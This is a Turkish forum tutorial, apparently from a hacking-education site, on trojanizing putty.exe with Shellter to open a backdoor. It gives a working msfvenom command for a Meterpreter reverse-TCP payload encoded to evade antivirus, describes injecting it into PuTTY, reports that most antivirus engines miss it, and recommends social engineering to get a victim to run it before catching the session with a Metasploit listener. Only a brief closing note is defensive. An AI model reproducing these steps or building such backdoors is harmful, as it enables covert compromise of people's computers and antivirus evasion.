Siber Güvenlik Dünyasına Hoşgeldiniz

Ulusal Siber Güvenlik Akademisi olarak sizlere bu alanda siber güvenlik & ethical hacking eğitimi , günümüz siber saldırılarında kullanılan araç ve teknikleri kullanarak, siber güvenlik konusunda sizlere saldırı ve savunma yönünden eğitimler ile sizlerin çözümler üretebileceğiniz bir siber dünya sunuyoruz .

  • Ulusal Siber Güvenlik Akademisi olarak sizlere bu alanda siber güvenlik & ethical hacking eğitimi , günümüz siber saldırılarında kullanılan araç ve teknikleri kullanarak, siber güvenlik konusunda sizlere saldırı ve savunma yönünden eğitimler ile sizlerin çözümler üretebileceğiniz bir siber dünya sunuyoruz .

Shellter ile Backdoor Hazırlama ve Sisteme Sızma

Serberus

KURUCU
Yönetici
MAREŞAL
Katılım
27 May 2018
Mesajlar
149
Beğeniler
98
Uzmanlık Alanı
PHP
HTML
#1
Merhaba,

Bu yazımda bir sisteme sızmak için kullanılan güzel bir yöntemden bahsedeceğim.Sistemde yazılımsal açıklıklardan yararlanmak yerine zararlı bir dosya ile sisteme sızabilirsiniz.Bu zararlı dosyayı bir çok farklı yolla oluşturabilirsiniz.Bilginiz ölçüsünde kendiniz yazabilirsiniz,msfvenom ile kendiniz bir zararlı uygulama oluşturabilirsiniz ya da her hangi bir uygulamaya payload yerleştirebilirsiniz.

Bugün biz bunu yapacağız windowsta ssh bağlantısı için kullanılan Putty.exe programına Payload yerleştirip bununla bir sisteme sızmayı anlatacağım.Bunun dışında msfvenom ile oluşturduğunuz uygulama -e parametresi ile encode ederek antivirüsleri geçmesini sağlanabiliyor fakat genelde bilindiği için bu encode ve payloadlar tamamen bypass etmek zor.

HTML:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.237.128 LPORT=4444 -f exe -o /root/Desktop/zararli.exe  -e x86/shikata_ga_nai -i 20
Yukarıdaki msfvenom komutu ile haberleşeceği ip ve portu belirterek zararlı.exe oluşturarak shikata_ga_nai ile 20 kere encode ettik.Fakat biz bu yazıda bu şekilde yapmayacağız bu ne kadar encode etsekde bir çok antivirüs hem yakalıyor hemde oluşturduğumu zararlı sadece siyah bir cmd ekranı açıyor buda kurbanın hemen kapatması ya da şüphelenerek silmesi anlamına gelmektedir.Bunun için putty.exe seçtik internettten putty.exe yi indirerek ona kendi payloadımızı yerleştireceğiz.Bu aşamadan sonra Sosyal Mühendislik ve diğer yolları kullanarak kurbanın uygulamayı çalıştırmasını sağlamalıyız.

Şimdi gelelim putty.exe ye Payloadımızı yerleştirmeye bunu yine msfvenom ile yapabilmekteyiz.Ya da bunun için başka bir alternatif olan Shellter uygulaması ile yapabilmekteyiz.Shellter windowsda çalışan bir uygulamadır fakat wine ile Linuxta çalıştırılmaktadır.
You do not have permission to view link Giriş yap veya üye ol.
adresinden uygulamayı indirebilirsiniz.
You do not have permission to view link Giriş yap veya üye ol.
adresindende putty.exe uygulamasını indirebilirsiniz.

Daha sonra aşağıdaki ekran görüntülerindeki gibi yerleştirilecek payload encoder haberleşilecel ip ve port bilgilerini shellter a girerek putty.exe artık bizim hazırladığımız backdoorumuz olacaktır.Her adım ekran görüntülerinde mevcuttur.

You do not have permission to view link Giriş yap veya üye ol.




You do not have permission to view link Giriş yap veya üye ol.


You do not have permission to view link Giriş yap veya üye ol.


You do not have permission to view link Giriş yap veya üye ol.


You do not have permission to view link Giriş yap veya üye ol.


Artık backdoorumuz oluştu.Enter a basarak shellter kapanacaktır.

You do not have permission to view link Giriş yap veya üye ol.


Oluşturduğumuz backdoor virustotal de kontrol ettiğimizde 57 antivirusden 10 tanesi yakayabildi.Bunların dışında bir çok popüler antivirus uygulaması yakayamadı.Özel bir işlem gerçekleştirmeden 47 tane antivirüsü geçmesi gayet başarılı bir sonuç bence shellter uygulaması bu konuda gayet başarılı başka encoder ve işlemler sonucu daha iyi sonuçlar elde edilecektir. NOT: Linux ortamında hazırlandığında daha az antivirus tarafından yakalanmaktadır.Daha iyi sonuçlar alabilirsiniz.

Bundan sonraki kısım oluşturduğumuz uygulamayı kurbanın çalıştırılması bir senaryo ile bu sağlanmalıdır.

You do not have permission to view link Giriş yap veya üye ol.


Metasploitimizi açarak multi handlerı açarak dinleme moduna geçiyoruz ve uygulama çalıştığı anda oturum elde etmeye çalışacağız.

You do not have permission to view link Giriş yap veya üye ol.


Artık her şey tamam sadece uygulayı kurbanımızın indirip çalıştırması gerekmektedir.

You do not have permission to view link Giriş yap veya üye ol.


Uygulamayı bu şekilde açıldıktan sonra backdoorumuzu oluştururken haberleşmesi için girdiğimiz ip ve port numaralarıyla haberleşecektir.

You do not have permission to view link Giriş yap veya üye ol.


Gördüğünüz üzere meterperter satırı ile oturum elde ettik.

You do not have permission to view link Giriş yap veya üye ol.


Bilgisayarda antivirus olmaması ya da gerçekleştirdiğimiz işlemler sonucunda bunu yakalayamayan bir antivirus programının hiç bir faydası olmayacaktır.Kurban putty ile ssh bağlanarak her zamanki işlemini yaparken bizde sisteme sızmış oluyoruz.Bunun için güncel bir antivirus kullanmanız bazı durumlarda işinize yarayacaktır.Bilmediğiniz kaynaklardan dosya indirmeyiniz indirdiysenizde kurmadan önce en azından virustotal e yükleyerek kontrol edebilirsiniz.Bu yazıda bende hazır windows xp vardı onu kullandım ama Windows7,10 hiç fark etmez aynı şekilde çalışacaktır.